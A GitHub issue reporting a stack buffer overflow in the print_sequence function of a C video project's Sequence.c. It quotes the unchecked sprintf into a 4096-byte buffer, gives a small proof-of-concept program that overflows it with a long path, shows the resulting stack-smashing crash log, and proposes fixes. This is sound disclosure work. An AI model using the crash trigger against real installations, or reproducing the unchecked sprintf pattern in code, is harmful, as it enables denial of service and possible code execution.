Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stack Buffer Overflow at src/Sequence.c #10

Open
xVL00PeR opened this issue Apr 28, 2019 · 1 comment
Open

Stack Buffer Overflow at src/Sequence.c #10

xVL00PeR opened this issue Apr 28, 2019 · 1 comment

Comments

@xVL00PeR
Copy link

In file src/Sequence.c at line 567 a stack buffer overflow can occur due to the fact that there's no length check on the buf local variable.

/**
 * get sequence string
 * @param  seq Sequence to get data
 * @return     string allocated on heap, to be freed by caller
 */
char *print_sequence(Sequence *seq) {
    // (...)
    char buf[4096];
    // (...)

    for(int i = 0; currNode != NULL; i++) {

        // Here it is!!
        sprintf(buf, "Clip [%d]\nurl: %s\nstart_pts: %ld\nend_pts: %ld\norig_start_pts: %ld\norig_end_pts: %ld\nvid_ctx: %p\n",
                i, c->vid_ctx->url, c->start_pts, c->end_pts, c->orig_start_pts, c->orig_end_pts, c->vid_ctx);
    }
    return str;
}

This can lead to a crash or to arbitrary code execution.

I wrote a POC for showing this:

/**
 * This is a proof of concept of a possible buffer overflow
 * in src/Sequence.c -> print_sequence() -> line: 567
 *
 * A buffer overflow can occur by trying to print a sequence
 * with a large enough path.
 *
 * In UNIX, the maximun size of a path is 4096 bytes, so in this
 * POC we still handle realistic sizes.
 */

#include "Timebase.h"
#include "Sequence.h"
#include "OutputContext.h"

int main(int argc, char **argv) {
    Sequence seq;
    init_sequence(&seq, 30, 48000);

    char *large_buffer = (char *)malloc(4096);
    for (uint64_t i = 0; i < 4096; i++){
      *(large_buffer+i) = 'A';
    }
    Clip *clip = malloc(sizeof(Clip));
    init_clip(clip, large_buffer);

    open_clip(clip);

    set_clip_bounds(clip, 53, 61);

    sequence_append_clip(&seq, clip);

    char *str = print_sequence(&seq);
    printf("Sequence:\n%s\n", str);
    free(str);
    str = NULL;


    free_sequence(&seq);
    return 0;
}

And here's the crash log:

Could not open source file AAAAAAAAAAAA(skipped...)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
open_clip() error: Failed to open VideoContext for clip[AAAAAAAAAAAAAAAAA(skipped...)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
Video stream does not exist
sequence add clip [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(skipped...)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA], start_pts: 0
Failed to get video time_base: clip[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(skipped...)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] is not open
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

As the maximum size of a UNIX path is 4096 bytes, my idea for fixing this is pretty simple:

  1. Make the variable buf bigger so that it can fit a 4096 bytes path.
  2. Check at the start of the function if the path is bigger than 4096 bytes, and if so:
    Option 1: Cut it
    Option 2: return -1 and abort
@CosmicSage
Copy link

Cool find

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants